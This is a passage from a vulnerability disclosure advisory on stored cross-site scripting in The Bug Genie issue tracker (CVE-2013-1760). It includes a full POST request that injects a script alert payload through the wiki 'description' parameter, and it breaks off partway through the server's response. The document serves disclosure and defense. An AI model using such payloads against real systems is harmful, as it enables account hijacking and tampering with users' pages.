Trustwave SpiderLabs Security Advisory TWSL2013-002: Multiple XSS Vulnerabilities in The Bug Genie Published: 05/14/2013 Version: 1.1 Vendor: The Bug Genie (http://www.thebuggenie.com/) Product: The Bug Genie Version affected: 3.2.5 and prior Product description: The Bug Genie is an open source issue tracking and project management application that features an integrated wiki, support for version control systems, and an agile development workflow. The Bug Genie is written in PHP and has support for MySQL or PostgreSQL database backends. Finding 1: Multiple Cross-Site Scripting Vulnerabilities *****Credit: James Espinosa of Trustwave SpiderLabs CVE: CVE-2013-1760 CWE: CWE-79 Example(s): 1. Performing XSS via POST request on 'description' parameter in Wiki menu. Requires user to be authenticated. The optional 'description' parameter when creating articles under the wiki menu is vulnerable to persistent cross-site scripting (XSS) vulnerabilities. #Request POST /buggenie/thebuggenie/attach/link/to/wiki/0 HTTP/1.1 Host: A.B.C.D Connection: keep-alive Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://A.B.C.D/buggenie/thebuggenie/wiki Content-Length: 71 link_url=testing&description=%3Cscript%3Ealert('xss')%3B%3C%2Fscript%3E #Response HTTP/1.1 200 OK Date: Thu, 03 Jan 2013 20:04:23 GMT Server: Apache/2.2.22 (Ubuntu) X-Powered-By: PHP/5.4.6-1ubuntu1.1 Content-Length: 743 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/json; charset=utf-8 {"message":"Link added!","content":"